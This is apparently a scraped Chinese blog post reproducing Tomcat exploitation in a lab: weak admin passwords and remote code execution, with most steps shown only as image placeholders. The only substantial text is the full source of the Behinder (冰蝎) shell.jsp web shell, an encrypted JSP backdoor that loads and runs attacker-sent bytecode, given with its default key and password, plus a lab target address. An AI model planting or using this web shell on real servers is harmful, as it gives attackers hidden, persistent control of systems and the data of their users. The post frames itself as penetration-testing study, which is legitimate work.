【精选】中间件 tomcat漏洞复现

 博主介绍

‍ 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
点赞➕评论➕收藏 == 养成习惯(一键三连)
欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋
作者水平有限,欢迎各位大佬指点,相互学习进步!


目录

1、tomcat后台弱口令漏洞利用

利用冰蝎连接:

2、tomcat远程代码执行漏洞

利用冰蝎子连接:


1、tomcat后台弱口令漏洞利用

【精选】中间件 tomcat漏洞复现_第1张图片

【精选】中间件 tomcat漏洞复现_第2张图片

【精选】中间件 tomcat漏洞复现_第3张图片

利用冰蝎连接:

【精选】中间件 tomcat漏洞复现_第4张图片

【精选】中间件 tomcat漏洞复现_第5张图片

2、tomcat远程代码执行漏洞

靶场:124.70.71.251:49586

利用冰蝎的shell.jsp文件

shell.jsp:
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(Base64.getDecoder().decode(request.getReader().readLine()))).newInstance().equals(pageContext);}%>







【精选】中间件 tomcat漏洞复现_第6张图片

【精选】中间件 tomcat漏洞复现_第7张图片

【精选】中间件 tomcat漏洞复现_第8张图片

利用冰蝎子连接:

【精选】中间件 tomcat漏洞复现_第9张图片

你可能感兴趣的:(windows,linux系统开发,web,中间件,windows,linux,tomcat,python,服务器,kali)